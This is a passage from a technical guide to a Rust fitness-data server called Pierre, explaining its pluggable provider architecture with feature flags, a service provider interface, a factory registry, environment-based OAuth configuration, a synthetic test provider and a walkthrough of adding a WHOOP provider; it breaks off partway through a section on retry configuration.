- Cursor pagination: More reliable than offset pagination for dynamic data.
- Default trait methods: Optional provider features (sleep, recovery) have default "unsupported" implementations.
- Retry config: Configurable retry attempts, backoff, and status codes per provider.
Next Chapter: Chapter 18: A2A Protocol - Agent-to-Agent Communication - Learn how Pierre implements the Agent-to-Agent (A2A) protocol for secure inter-agent communication with Ed25519 signatures.
Chapter 17.5: Pluggable Provider Architecture
This chapter explores Pierre's pluggable provider architecture, which enables runtime registration of any number of fitness providers simultaneously. You'll learn about provider factories, dynamic discovery, environment-based configuration, and how to add new providers without modifying existing code.
Pluggable Architecture Overview
Pierre implements a fully pluggable provider system where fitness providers are registered at runtime through a factory pattern. The system supports any number of providers simultaneously, meaning you can use just Strava, or Strava + Garmin + Fitbit + custom providers all at once.
┌────────────────────────────────────────────────────────────────────────────────────┐
│ ProviderRegistry (runtime) │
│ Manages 1 to N providers with dynamic discovery │
└───────────┬────────────────────────────────────────────────────────────────────────┘
│
┌────────┴────────┬───────────┬────────────┬──────────┬────────┬─────────┬─────────────┐
│ │ │ │ │ │ │ │
▼ ▼ ▼ ▼ ▼ ▼ ▼ ▼
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌───────┐ ┌───────┐ ┌─────────┐ ┌─────────┐
│ Strava │ │ Garmin │ │ Terra │ │ Fitbit │ │ WHOOP │ │ COROS │ │Synthetic│ │ Custom │
│ Factory │ │ Factory │ │ Factory │ │ Factory │ │Factory│ │Factory│ │ Factory │ │ Factory │
└────┬────┘ └────┬────┘ └────┬────┘ └────┬────┘ └───┬───┘ └───┬───┘ └────┬────┘ └────┬────┘
│ │ │ │ │ │ │ │
▼ ▼ ▼ ▼ ▼ ▼ ▼ ▼
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌───────┐ ┌───────┐ ┌─────────┐ ┌─────────┐
│ Strava │ │ Garmin │ │ Terra │ │ Fitbit │ │ WHOOP │ │ COROS │ │Synthetic│ │ Custom │
│Provider │ │Provider │ │Provider │ │Provider │ │Provdr │ │Provdr │ │Provider │ │Provider │
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └───────┘ └───────┘ └─────────┘ └─────────┘
│ │ │ │ │ │ │ │
└─────────────┴───────────┴────────────┴───────────┴─────────┴──────────┴────────────┘
│
▼
┌──────────────────────────┐
│ FitnessProvider Trait │
│ (shared interface) │
└──────────────────────────┘
Key benefit: Add, remove, or swap providers without modifying tool code, connection handlers, or application logic.
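The factory-registry idea can be sketched in a few dozen lines: factories are registered by name at runtime and looked up to construct providers. Names and signatures below are illustrative, not the real `ProviderRegistry` API:

```rust
use std::collections::HashMap;

// Shared interface, standing in for the FitnessProvider trait.
trait Provider {
    fn name(&self) -> &'static str;
}

struct Strava;
impl Provider for Strava {
    fn name(&self) -> &'static str { "strava" }
}

// A factory is any function that constructs a boxed provider.
type Factory = fn() -> Box<dyn Provider>;

struct ProviderRegistry {
    factories: HashMap<&'static str, Factory>,
}

impl ProviderRegistry {
    fn new() -> Self {
        Self { factories: HashMap::new() }
    }

    // Register a factory under a provider name at runtime.
    fn register(&mut self, name: &'static str, factory: Factory) {
        self.factories.insert(name, factory);
    }

    // Construct a provider by name; None if never registered.
    fn create(&self, name: &str) -> Option<Box<dyn Provider>> {
        self.factories.get(name).map(|f| f())
    }
}

fn main() {
    let mut registry = ProviderRegistry::new();
    registry.register("strava", || Box::new(Strava));
    assert!(registry.create("strava").is_some());
    assert!(registry.create("garmin").is_none()); // not registered in this sketch
}
```

Because tools only see the trait object returned by `create`, registering a new factory is enough to make a new provider available everywhere.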
Feature Flags (Compile-Time Selection)
Pierre uses Cargo feature flags for compile-time provider selection. This allows minimal binaries with only the providers you need:
Source: Cargo.toml
# Provider feature flags - enable/disable individual fitness data providers
provider-strava = []
provider-garmin = []
provider-terra = []
provider-fitbit = []
provider-whoop = []
provider-coros = []
provider-synthetic = []
all-providers = ["provider-strava", "provider-garmin", "provider-terra", "provider-fitbit", "provider-whoop", "provider-coros", "provider-synthetic"]
Build with specific providers:
# All providers (default)
cargo build --release
# Only Strava
cargo build --release --no-default-features --features "sqlite,provider-strava"
# Strava + Garmin (no synthetic)
cargo build --release --no-default-features --features "sqlite,provider-strava,provider-garmin"
Conditional compilation in code:
#![allow(unused)]
fn main() {
// Provider modules conditionally compiled
#[cfg(feature = "provider-strava")]
pub mod strava_provider;
#[cfg(feature = "provider-garmin")]
pub mod garmin_provider;
#[cfg(feature = "provider-whoop")]
pub mod whoop_provider;
#[cfg(feature = "provider-coros")]
pub mod coros_provider;
#[cfg(feature = "provider-synthetic")]
pub mod synthetic_provider;
}
Note: COROS API access requires applying to their developer program at https://support.coros.com/hc/en-us/articles/17085887816340. Documentation is provided after approval.
Service Provider Interface (SPI)
The SPI defines the contract for pluggable providers, enabling external crates to register providers without modifying core code.
ProviderDescriptor Trait
Source: src/providers/spi.rs:129-177
#![allow(unused)]
fn main() {
/// Service Provider Interface (SPI) for pluggable fitness providers
///
/// External provider crates implement this trait to describe their capabilities.
pub trait ProviderDescriptor: Send + Sync {
/// Unique provider identifier (e.g., "strava", "garmin", "whoop")
fn name(&self) -> &'static str;
/// Human-readable display name (e.g., "Strava", "Garmin Connect")
fn display_name(&self) -> &'static str;
/// Provider capabilities using bitflags
fn capabilities(&self) -> ProviderCapabilities;
/// OAuth endpoints (None for non-OAuth providers like synthetic)
fn oauth_endpoints(&self) -> Option<OAuthEndpoints>;
/// OAuth parameters (scope separator, PKCE, etc.)
fn oauth_params(&self) -> Option<OAuthParams>;
/// Base URL for API requests
fn api_base_url(&self) -> &'static str;
/// Default OAuth scopes for this provider
fn default_scopes(&self) -> &'static [&'static str];
}
}
ProviderCapabilities (Bitflags)
Provider capabilities use bitflags for efficient storage and combinators:
Source: src/providers/spi.rs:95-126
#![allow(unused)]
fn main() {
bitflags::bitflags! {
/// Provider capability flags using bitflags for efficient storage
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct ProviderCapabilities: u8 {
/// Provider supports OAuth 2.0 authentication
const OAUTH = 0b0000_0001;
/// Provider supports activity data (workouts, runs, rides)
const ACTIVITIES = 0b0000_0010;
/// Provider supports sleep tracking data
const SLEEP_TRACKING = 0b0000_0100;
/// Provider supports recovery metrics (HRV, strain)
const RECOVERY_METRICS = 0b0000_1000;
/// Provider supports health metrics (weight, body composition)
const HEALTH_METRICS = 0b0001_0000;
}
}
impl ProviderCapabilities {
/// Activity-only provider (OAuth + activities)
pub const fn activity_only() -> Self {
Self::OAUTH.union(Self::ACTIVITIES)
}
/// Full health provider (all capabilities)
pub const fn full_health() -> Self {
Self::OAUTH
.union(Self::ACTIVITIES)
.union(Self::SLEEP_TRACKING)
.union(Self::RECOVERY_METRICS)
.union(Self::HEALTH_METRICS)
}
}
}
Using capabilities:
#![allow(unused)]
fn main() {
// Check specific capability
if provider.capabilities().contains(ProviderCapabilities::SLEEP_TRACKING) {
// Provider supports sleep data
}
// Combine capabilities
let caps = ProviderCapabilities::OAUTH | ProviderCapabilities::ACTIVITIES;
// Use convenience constructors
let full_health = ProviderCapabilities::full_health();
}
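For intuition, the same combinator behavior can be reproduced with a plain u8 newtype. This is a standalone sketch that mirrors ProviderCapabilities without pulling in the bitflags crate; the type name `Caps` is invented for the sketch:

```rust
/// Standalone sketch of the capability flags: a u8 newtype with the same
/// bit layout and const combinators as the bitflags-generated type.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct Caps(u8);

impl Caps {
    pub const OAUTH: Caps = Caps(0b0000_0001);
    pub const ACTIVITIES: Caps = Caps(0b0000_0010);
    pub const SLEEP_TRACKING: Caps = Caps(0b0000_0100);
    pub const RECOVERY_METRICS: Caps = Caps(0b0000_1000);
    pub const HEALTH_METRICS: Caps = Caps(0b0001_0000);

    /// Bitwise OR: combine two capability sets.
    pub const fn union(self, other: Caps) -> Caps {
        Caps(self.0 | other.0)
    }

    /// True if every bit in `other` is set in `self`.
    pub const fn contains(self, other: Caps) -> bool {
        self.0 & other.0 == other.0
    }

    /// Activity-only provider (OAuth + activities).
    pub const fn activity_only() -> Caps {
        Caps::OAUTH.union(Caps::ACTIVITIES)
    }

    /// Full health provider (all capabilities).
    pub const fn full_health() -> Caps {
        Caps::OAUTH
            .union(Caps::ACTIVITIES)
            .union(Caps::SLEEP_TRACKING)
            .union(Caps::RECOVERY_METRICS)
            .union(Caps::HEALTH_METRICS)
    }
}
```

Because `contains` checks that all requested bits are set, a single call can test a combined capability set, e.g. `caps.contains(Caps::OAUTH.union(Caps::ACTIVITIES))`.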
OAuthParams
OAuth configuration varies by provider (scope separators, PKCE support):
Source: src/providers/spi.rs:85-93
#![allow(unused)]
fn main() {
/// OAuth parameters for provider-specific configuration
#[derive(Debug, Clone)]
pub struct OAuthParams {
/// Scope separator character (space for Fitbit, comma for Strava)
pub scope_separator: &'static str,
/// Whether to use PKCE (recommended for public clients)
pub use_pkce: bool,
/// Additional query parameters for authorization URL
pub additional_auth_params: &'static [(&'static str, &'static str)],
}
}
Provider Registry
The ProviderRegistry is the central hub for managing all fitness providers:
Source: src/providers/registry.rs:13-60
#![allow(unused)]
fn main() {
/// Central registry for all fitness providers with factory pattern
pub struct ProviderRegistry {
/// Map of provider names to their factories
factories: HashMap<String, Box<dyn ProviderFactory>>,
/// Default configurations for each provider (loaded from environment)
default_configs: HashMap<String, ProviderConfig>,
}
impl ProviderRegistry {
/// Create registry and auto-register all known providers
#[must_use]
pub fn new() -> Self {
let mut registry = Self {
factories: HashMap::new(),
default_configs: HashMap::new(),
};
// Register Strava provider with environment-based config
registry.register_factory(
oauth_providers::STRAVA,
Box::new(StravaProviderFactory),
);
let config = load_provider_env_config(
oauth_providers::STRAVA,
"https://www.strava.com/oauth/authorize",
"https://www.strava.com/oauth/token",
"https://www.strava.com/api/v3",
Some("https://www.strava.com/oauth/deauthorize"),
&[oauth_providers::STRAVA_DEFAULT_SCOPES.to_owned()],
);
registry.set_default_config(oauth_providers::STRAVA, /* config */);
// Register Garmin provider
registry.register_factory(
oauth_providers::GARMIN,
Box::new(GarminProviderFactory),
);
// ... Garmin config
// Register Synthetic provider (no OAuth needed!)
registry.register_factory(
oauth_providers::SYNTHETIC,
Box::new(SyntheticProviderFactory),
);
// ... Synthetic config
registry
}
/// Register a provider factory for runtime creation
pub fn register_factory(&mut self, name: &str, factory: Box<dyn ProviderFactory>) {
self.factories.insert(name.to_owned(), factory);
}
/// Check if provider is supported (dynamic discovery)
#[must_use]
pub fn is_supported(&self, provider: &str) -> bool {
self.factories.contains_key(provider)
}
/// Get all supported provider names (1 to x providers)
#[must_use]
pub fn supported_providers(&self) -> Vec<String> {
self.factories.keys().map(ToString::to_string).collect()
}
/// Create provider instance from factory
pub fn create_provider(&self, name: &str) -> Option<Box<dyn FitnessProvider>> {
let factory = self.factories.get(name)?;
let config = self.default_configs.get(name)?.clone();
Some(factory.create(config))
}
}
}
Registry responsibilities:
- Factory storage: Maps provider names to factory implementations
- Dynamic discovery: is_supported() and supported_providers() enable runtime introspection
- Configuration management: Stores default configs loaded from environment
- Provider creation: create_provider() instantiates providers on-demand
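These responsibilities can be seen in miniature in the following sketch, where the trait is cut down to a single method and a hypothetical Strava stand-in plays the role of a real factory:

```rust
use std::collections::HashMap;

// Minimal sketch of the registry: factory storage, dynamic discovery,
// and on-demand creation, with the provider trait reduced to one method.
trait Provider {
    fn name(&self) -> &'static str;
}

trait ProviderFactory {
    fn create(&self) -> Box<dyn Provider>;
}

struct Strava;
impl Provider for Strava {
    fn name(&self) -> &'static str { "strava" }
}

struct StravaFactory;
impl ProviderFactory for StravaFactory {
    fn create(&self) -> Box<dyn Provider> { Box::new(Strava) }
}

struct Registry {
    factories: HashMap<String, Box<dyn ProviderFactory>>,
}

impl Registry {
    fn new() -> Self {
        Registry { factories: HashMap::new() }
    }

    /// Factory storage: map provider name to its factory.
    fn register(&mut self, name: &str, factory: Box<dyn ProviderFactory>) {
        self.factories.insert(name.to_owned(), factory);
    }

    /// Dynamic discovery: supported means "a factory is registered".
    fn is_supported(&self, name: &str) -> bool {
        self.factories.contains_key(name)
    }

    /// On-demand creation via the stored factory.
    fn create_provider(&self, name: &str) -> Option<Box<dyn Provider>> {
        Some(self.factories.get(name)?.create())
    }
}
```

Registering a new provider is a single `register` call; nothing downstream needs to change.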
Provider Factory Pattern
Each provider implements a ProviderFactory trait for creation:
Source: src/providers/core.rs:173-180
#![allow(unused)]
fn main() {
/// Provider factory for creating instances
pub trait ProviderFactory: Send + Sync {
/// Create a new provider instance with the given configuration
fn create(&self, config: ProviderConfig) -> Box<dyn FitnessProvider>;
/// Get supported provider names (for multi-provider factories)
fn supported_providers(&self) -> &'static [&'static str];
}
}
Example: Strava factory:
Source: src/providers/registry.rs:20-28
#![allow(unused)]
fn main() {
/// Factory for creating Strava provider instances
struct StravaProviderFactory;
impl ProviderFactory for StravaProviderFactory {
fn create(&self, config: ProviderConfig) -> Box<dyn FitnessProvider> {
Box::new(StravaProvider::new(config))
}
fn supported_providers(&self) -> &'static [&'static str] {
&["strava"]
}
}
}
Example: Synthetic factory (Phase 1):
Source: src/providers/registry.rs:30-38
#![allow(unused)]
fn main() {
/// Factory for creating Synthetic provider instances
struct SyntheticProviderFactory;
impl ProviderFactory for SyntheticProviderFactory {
fn create(&self, _config: ProviderConfig) -> Box<dyn FitnessProvider> {
Box::new(SyntheticProvider::default())
}
fn supported_providers(&self) -> &'static [&'static str] {
&["synthetic"]
}
}
}
Factory pattern benefits:
- Lazy instantiation: Providers created only when needed
- Configuration injection: Factory receives config at creation time
- Type erasure: Returns Box<dyn FitnessProvider> for uniform handling
Environment-Based Configuration
Pierre loads provider configuration from environment variables for cloud-native deployment (GCP, AWS, etc.):
Configuration schema:
# Default provider (1 required, used when no provider specified)
export PIERRE_DEFAULT_PROVIDER=strava # or garmin, synthetic, custom
# Per-provider configuration (repeat for each provider 1 to x)
export PIERRE_STRAVA_CLIENT_ID=your-client-id
export PIERRE_STRAVA_CLIENT_SECRET=your-secret
export PIERRE_STRAVA_AUTH_URL=https://www.strava.com/oauth/authorize
export PIERRE_STRAVA_TOKEN_URL=https://www.strava.com/oauth/token
export PIERRE_STRAVA_API_BASE_URL=https://www.strava.com/api/v3
export PIERRE_STRAVA_REVOKE_URL=https://www.strava.com/oauth/deauthorize
export PIERRE_STRAVA_SCOPES="activity:read_all,profile:read_all"
# Garmin provider
export PIERRE_GARMIN_CLIENT_ID=your-consumer-key
export PIERRE_GARMIN_CLIENT_SECRET=your-consumer-secret
# ... Garmin URLs and scopes
# Synthetic provider (no OAuth needed - perfect for dev/testing!)
# No env vars required - automatically available
Loading configuration:
Source: src/config/environment.rs:2093-2174
#![allow(unused)]
fn main() {
/// Load provider-specific configuration from environment variables
///
/// Falls back to provided defaults if environment variables are not set.
/// Supports legacy env vars (STRAVA_CLIENT_ID) for backward compatibility.
#[must_use]
pub fn load_provider_env_config(
provider: &str,
default_auth_url: &str,
default_token_url: &str,
default_api_base_url: &str,
default_revoke_url: Option<&str>,
default_scopes: &[String],
) -> ProviderEnvConfig {
let provider_upper = provider.to_uppercase();
// Load client credentials with fallback to legacy env vars
let client_id = env::var(format!("PIERRE_{provider_upper}_CLIENT_ID"))
.or_else(|_| env::var(format!("{provider_upper}_CLIENT_ID")))
.ok();
let client_secret = env::var(format!("PIERRE_{provider_upper}_CLIENT_SECRET"))
.or_else(|_| env::var(format!("{provider_upper}_CLIENT_SECRET")))
.ok();
// Load URLs with defaults
let auth_url = env::var(format!("PIERRE_{provider_upper}_AUTH_URL"))
.unwrap_or_else(|_| default_auth_url.to_owned());
// ... load other fields
ProviderEnvConfig { client_id, client_secret, auth_url, /* ...remaining fields */ }
}
}
Backward compatibility:
- New format: PIERRE_STRAVA_CLIENT_ID (preferred)
- Legacy format: STRAVA_CLIENT_ID (still supported)
- Graceful fallback: Tries the new format first, then legacy
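The new-then-legacy fallback reduces to one `or_else` chain. In this sketch the environment lookup is passed in as a function so the logic can be exercised without mutating process state; `resolve_client_id` is a hypothetical name for the sketch:

```rust
/// Resolve a provider's client ID, preferring the PIERRE_-prefixed variable
/// and falling back to the legacy unprefixed one. The lookup is a parameter
/// so the fallback logic is testable without touching std::env.
fn resolve_client_id(
    provider: &str,
    lookup: impl Fn(&str) -> Option<String>,
) -> Option<String> {
    let upper = provider.to_uppercase();
    lookup(&format!("PIERRE_{upper}_CLIENT_ID"))          // new format first
        .or_else(|| lookup(&format!("{upper}_CLIENT_ID"))) // then legacy
}
```

In production code the same chain runs over `env::var`, as shown in `load_provider_env_config` above.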
Dynamic Provider Discovery
Connection tools automatically discover available providers at runtime:
Source: src/protocols/universal/handlers/connections.rs:84-88
#![allow(unused)]
fn main() {
// Multi-provider mode - check all supported providers from registry
let providers_to_check = executor.resources.provider_registry.supported_providers();
let mut providers_status = serde_json::Map::new();
for provider in providers_to_check {
let is_connected = matches!(
executor
.auth_service
.get_valid_token(user_uuid, provider, request.tenant_id.as_deref())
.await,
Ok(Some(_))
);
providers_status.insert(
provider.to_owned(),
serde_json::json!({
"connected": is_connected,
"status": if is_connected { "connected" } else { "disconnected" }
}),
);
}
}
Dynamic provider validation:
Source: src/protocols/universal/handlers/connections.rs:224-228
#![allow(unused)]
fn main() {
/// Validate that provider is supported using provider registry
fn is_provider_supported(
provider: &str,
provider_registry: &crate::providers::ProviderRegistry,
) -> bool {
provider_registry.is_supported(provider)
}
}
Dynamic error messages:
Source: src/protocols/universal/handlers/connections.rs:333-340
#![allow(unused)]
fn main() {
if !is_provider_supported(provider, &executor.resources.provider_registry) {
let supported_providers = executor
.resources
.provider_registry
.supported_providers()
.join(", ");
return Ok(connection_error(format!(
"Provider '{provider}' is not supported. Supported providers: {supported_providers}"
)));
}
}
Result: Error messages automatically update when you add/remove providers. No hardcoded lists!
Synthetic Provider (Phase 1)
Pierre includes a synthetic provider for development and testing without OAuth:
Source: src/providers/synthetic_provider.rs:30-79
#![allow(unused)]
fn main() {
/// Synthetic fitness provider for development and testing (no OAuth required!)
///
/// This provider generates realistic fitness data without connecting to external APIs.
/// Perfect for:
/// - Development without OAuth credentials
/// - Integration tests
/// - Demo environments
/// - CI/CD pipelines
pub struct SyntheticProvider {
activities: Arc<RwLock<Vec<Activity>>>,
activity_index: Arc<RwLock<HashMap<String, Activity>>>,
config: ProviderConfig,
}
impl SyntheticProvider {
/// Create provider with pre-populated synthetic activities
#[must_use]
pub fn with_activities(activities: Vec<Activity>) -> Self {
let mut index = HashMap::new();
for activity in &activities {
index.insert(activity.id.clone(), activity.clone());
}
Self {
activities: Arc::new(RwLock::new(activities)),
activity_index: Arc::new(RwLock::new(index)),
config: ProviderConfig {
name: oauth_providers::SYNTHETIC.to_owned(),
auth_url: "http://localhost:8081/synthetic/auth".to_owned(),
token_url: "http://localhost:8081/synthetic/token".to_owned(),
api_base_url: "http://localhost:8081/synthetic/api".to_owned(),
revoke_url: None,
default_scopes: vec!["read:all".to_owned()],
},
}
}
}
}
Synthetic provider benefits:
- No OAuth dance: Skip authorization flows during development
- Deterministic data: Same activities every time for testing
- Fast iteration: No network calls, instant responses
- CI/CD friendly: No API keys or secrets needed
- Always available: Listed in supported_providers()
Default provider selection:
Source: src/config/environment.rs:2060-2078
#![allow(unused)]
fn main() {
/// Get default provider from PIERRE_DEFAULT_PROVIDER or fallback to "synthetic"
#[must_use]
pub fn default_provider() -> String {
use crate::constants::oauth_providers;
env::var("PIERRE_DEFAULT_PROVIDER")
.ok()
.filter(|s| !s.is_empty())
.unwrap_or_else(|| oauth_providers::SYNTHETIC.to_owned())
}
}
Fallback hierarchy:
- PIERRE_DEFAULT_PROVIDER=strava → use Strava
- PIERRE_DEFAULT_PROVIDER=garmin → use Garmin
- Not set or empty → use Synthetic (OAuth-free development)
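The fallback hierarchy is just `filter` plus a default. A sketch with the env value passed in as a parameter (so the hierarchy is testable without setting variables):

```rust
/// Sketch of default-provider resolution: use the env value when present
/// and non-empty, otherwise fall back to the OAuth-free synthetic provider.
fn default_provider(env_value: Option<&str>) -> String {
    env_value
        .filter(|s| !s.is_empty())            // treat "" the same as unset
        .map(str::to_owned)
        .unwrap_or_else(|| "synthetic".to_owned())
}
```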
Adding a Custom Provider (SPI Approach)
Here’s how to add a new provider using the SPI architecture:
Step 1: Add Feature Flag
Source: Cargo.toml
[features]
provider-whoop = []
all-providers = ["provider-strava", "provider-garmin", "provider-terra", "provider-fitbit", "provider-whoop", "provider-coros", "provider-synthetic"]
Step 2: Implement ProviderDescriptor (SPI)
Source: src/providers/spi.rs
#![allow(unused)]
fn main() {
use pierre_mcp_server::providers::spi::{
ProviderDescriptor, OAuthEndpoints, OAuthParams, ProviderCapabilities
};
/// WHOOP provider descriptor for SPI registration
#[cfg(feature = "provider-whoop")]
pub struct WhoopDescriptor;
#[cfg(feature = "provider-whoop")]
impl ProviderDescriptor for WhoopDescriptor {
fn name(&self) -> &'static str {
"whoop"
}
fn display_name(&self) -> &'static str {
"WHOOP"
}
fn capabilities(&self) -> ProviderCapabilities {
// WHOOP supports all health features - use bitflags combinator
ProviderCapabilities::full_health()
}
fn oauth_endpoints(&self) -> Option<OAuthEndpoints> {
Some(OAuthEndpoints {
auth_url: "https://api.prod.whoop.com/oauth/oauth2/auth",
token_url: "https://api.prod.whoop.com/oauth/oauth2/token",
revoke_url: Some("https://api.prod.whoop.com/oauth/oauth2/revoke"),
})
}
fn oauth_params(&self) -> Option<OAuthParams> {
Some(OAuthParams {
scope_separator: " ", // Space-separated scopes
use_pkce: true, // PKCE recommended
additional_auth_params: &[],
})
}
fn api_base_url(&self) -> &'static str {
"https://api.prod.whoop.com/developer/v1"
}
fn default_scopes(&self) -> &'static [&'static str] {
&["read:profile", "read:workout", "read:sleep", "read:recovery"]
}
}
}
Step 3: Implement FitnessProvider Trait
Source: src/providers/whoop_provider.rs
#![allow(unused)]
fn main() {
use pierre_mcp_server::providers::core::{FitnessProvider, ProviderConfig, OAuth2Credentials};
use pierre_mcp_server::models::{Activity, Athlete, Stats};
use pierre_mcp_server::errors::AppResult;
use async_trait::async_trait;
use std::sync::{Arc, RwLock};
#[cfg(feature = "provider-whoop")]
pub struct WhoopProvider {
config: ProviderConfig,
credentials: Arc<RwLock<Option<OAuth2Credentials>>>,
http_client: reqwest::Client,
}
#[cfg(feature = "provider-whoop")]
#[async_trait]
impl FitnessProvider for WhoopProvider {
fn name(&self) -> &'static str {
"whoop"
}
fn config(&self) -> &ProviderConfig {
&self.config
}
async fn set_credentials(&self, credentials: OAuth2Credentials) -> AppResult<()> {
// Store credentials using RwLock for interior mutability
let mut creds = self.credentials.write()
.map_err(|_| pierre_mcp_server::providers::errors::ProviderError::ConfigurationError(
"Failed to acquire credentials lock".to_owned()
))?;
*creds = Some(credentials);
Ok(())
}
async fn get_athlete(&self) -> AppResult<Athlete> {
// Real implementation: fetch from WHOOP API and convert to unified model
Ok(Athlete {
id: "whoop-user-123".to_owned(),
username: "athlete".to_owned(),
firstname: Some("WHOOP".to_owned()),
lastname: Some("User".to_owned()),
profile_picture: None,
provider: "whoop".to_owned(),
})
}
async fn get_activities(
&self,
_limit: Option<usize>,
_offset: Option<usize>,
) -> AppResult<Vec<Activity>> {
// Real implementation: fetch workouts from WHOOP API
Ok(vec![])
}
// ... implement remaining trait methods
}
}
Step 4: Create Provider Factory and Register
Source: src/providers/registry.rs
#![allow(unused)]
fn main() {
#[cfg(feature = "provider-whoop")]
use super::whoop_provider::WhoopProvider;
#[cfg(feature = "provider-whoop")]
use super::spi::WhoopDescriptor;
/// Factory for creating WHOOP provider instances
#[cfg(feature = "provider-whoop")]
struct WhoopProviderFactory;
#[cfg(feature = "provider-whoop")]
impl ProviderFactory for WhoopProviderFactory {
fn create(&self, config: ProviderConfig) -> Box<dyn FitnessProvider> {
Box::new(WhoopProvider::new(config))
}
fn supported_providers(&self) -> &'static [&'static str] {
&["whoop"]
}
}
// In ProviderRegistry::new():
#[cfg(feature = "provider-whoop")]
{
let descriptor = WhoopDescriptor;
registry.register_factory("whoop", Box::new(WhoopProviderFactory));
// Config loaded from descriptor's oauth_endpoints() and default_scopes()
}
}
Step 5: Add to Constants and Module Exports
Source: src/constants/oauth/providers.rs
#![allow(unused)]
fn main() {
#[cfg(feature = "provider-whoop")]
pub const WHOOP: &str = "whoop";
#[cfg(feature = "provider-whoop")]
pub const WHOOP_DEFAULT_SCOPES: &str = "read:profile read:workout read:sleep read:recovery";
}
Source: src/providers/mod.rs
#![allow(unused)]
fn main() {
#[cfg(feature = "provider-whoop")]
pub mod whoop_provider;
#[cfg(feature = "provider-whoop")]
pub use spi::WhoopDescriptor;
}
Step 6: Configure Environment
Source: .envrc
# WHOOP provider configuration
export WHOOP_CLIENT_ID=your-whoop-client-id
export WHOOP_CLIENT_SECRET=your-whoop-secret
export WHOOP_REDIRECT_URI=http://localhost:8081/api/oauth/callback/whoop
That’s it! WHOOP is now:
- ✅ Conditionally compiled with --features provider-whoop
- ✅ Available in supported_providers() when the feature is enabled
- ✅ Discoverable via is_supported("whoop")
- ✅ Creatable via create_provider("whoop")
- ✅ Listed in connection status responses
- ✅ Supported in the connect_provider tool
- ✅ Capabilities queryable via bitflags
No changes needed:
- ❌ Connection handlers (dynamic discovery)
- ❌ Tool implementations (use FitnessProvider trait)
- ❌ MCP schema generation (automatic)
- ❌ Test fixtures (provider-agnostic)
Managing 1 to X Providers Simultaneously
Pierre’s architecture supports multiple active providers per tenant/user:
Multi-provider connection status:
{
"success": true,
"result": {
"providers": {
"strava": {
"connected": true,
"status": "connected"
},
"garmin": {
"connected": true,
"status": "connected"
},
"fitbit": {
"connected": false,
"status": "disconnected"
},
"coros": {
"connected": true,
"status": "connected"
},
"synthetic": {
"connected": true,
"status": "connected"
},
"whoop": {
"connected": true,
"status": "connected"
}
}
}
}
Data aggregation across providers:
#![allow(unused)]
fn main() {
// Pseudo-code for fetching activities from all connected providers
async fn get_all_activities(user_id: Uuid, tenant_id: Uuid) -> Vec<Activity> {
let mut all_activities = Vec::new();
for provider_name in registry.supported_providers() {
if let Ok(Some(provider)) = create_authenticated_provider(
user_id,
tenant_id,
provider_name,
).await {
if let Ok(activities) = provider.get_activities(Some(50), None).await {
all_activities.extend(activities);
}
}
}
// Deduplicate and merge activities from multiple providers
all_activities.sort_by(|a, b| b.start_date.cmp(&a.start_date));
all_activities
}
}
Provider switching:
#![allow(unused)]
fn main() {
// Tools accept optional provider parameter
// Bind the default first so the borrowed String outlives the expression
let default = default_provider();
let provider_name = request
    .parameters
    .get("provider")
    .and_then(|v| v.as_str())
    .unwrap_or(&default);
let provider = registry.create_provider(provider_name)
.ok_or_else(|| ProtocolError::ProviderNotFound)?;
}
Shared Request/Response Traits
All providers implement the same FitnessProvider trait, ensuring uniform request/response patterns:
Request side (method parameters):
- IDs: &str for activity/athlete IDs
- Pagination: PaginationParams struct
- Date ranges: DateTime<Utc> for time-based queries
- Options: Option<T> for optional filters
Response side (domain models):
- Activity: Unified workout representation
- Athlete: User profile information
- Stats: Aggregate performance metrics
- PersonalRecord: Best achievements
- SleepSession, RecoveryMetrics, HealthMetrics: Health data
Shared error handling:
- AppResult: All providers return the same result type
- ProviderError: Structured error enum with retry information
- Consistent mapping: Provider-specific errors map to ProviderError
Benefits:
- Swappable: Change from Strava to Garmin without modifying tool code
- Testable: Mock any provider using the FitnessProvider trait
- Extensible: New providers must implement complete interface
Rust Idioms: Trait Object Factory
Source: src/providers/registry.rs:43-46
#![allow(unused)]
fn main() {
pub fn register_factory(&mut self, name: &str, factory: Box<dyn ProviderFactory>) {
self.factories.insert(name.to_owned(), factory);
}
}
Trait objects:
- Box<dyn ProviderFactory>: Heap-allocated trait object with dynamic dispatch
- Dynamic dispatch: Method calls resolved at runtime (vtable lookup)
- Polymorphism: Registry stores different factory types (Strava, Garmin, etc.)
- Type erasure: Concrete factory type erased, only trait methods accessible
Alternative (static dispatch):
#![allow(unused)]
fn main() {
// Generic approach (static dispatch)
pub fn register_factory<F: ProviderFactory + 'static>(&mut self, name: &str, factory: F) {
// Can't store different F types in same HashMap!
}
}
Why trait objects: Registry needs to store heterogeneous factory types in single collection.
Rust Idioms: Arc<RwLock> for Interior Mutability
Source: src/providers/synthetic_provider.rs:34-36
#![allow(unused)]
fn main() {
pub struct SyntheticProvider {
activities: Arc<RwLock<Vec<Activity>>>,
activity_index: Arc<RwLock<HashMap<String, Activity>>>,
config: ProviderConfig,
}
}
Pattern explanation:
- Arc: Atomic reference counting for shared ownership across threads
- RwLock: Reader-writer lock allowing multiple readers OR single writer
- Interior mutability: Mutate data inside &self (the FitnessProvider trait takes &self)
Why needed:
#![allow(unused)]
fn main() {
#[async_trait]
pub trait FitnessProvider: Send + Sync {
async fn get_activities(&self, ...) -> Result<Vec<Activity>>;
// ^^^^^ immutable reference
}
}
Without RwLock (doesn’t compile):
#![allow(unused)]
fn main() {
impl FitnessProvider for SyntheticProvider {
async fn get_activities(&self, ...) -> Result<Vec<Activity>> {
self.activities.push(...); // ❌ Can't mutate through &self
}
}
}
With RwLock (compiles):
#![allow(unused)]
fn main() {
impl FitnessProvider for SyntheticProvider {
async fn get_activities(&self, ...) -> Result<Vec<Activity>> {
let activities = self.activities.read().await; // ✅ Interior mutability
Ok(activities.clone())
}
}
}
Provider Resilience Patterns
Pierre implements multiple resilience patterns to handle provider failures gracefully.
Retry with Exponential Backoff
Source: src/providers/core.rs (conceptual)
#![allow(unused)]
fn main() {
/// Retry configuration for provider requests
pub struct RetryConfig {
/// Maximum number of retry attempts
pub max_retries: u32,
/// Base delay between retries (doubles each attempt)
pub base_delay_ms: u64,
/// Maximum delay cap
pub max_delay_ms: u64,
/// Jitter factor (0.0 to 1.0) to prevent thundering herd
pub jitter_factor: f64,
}
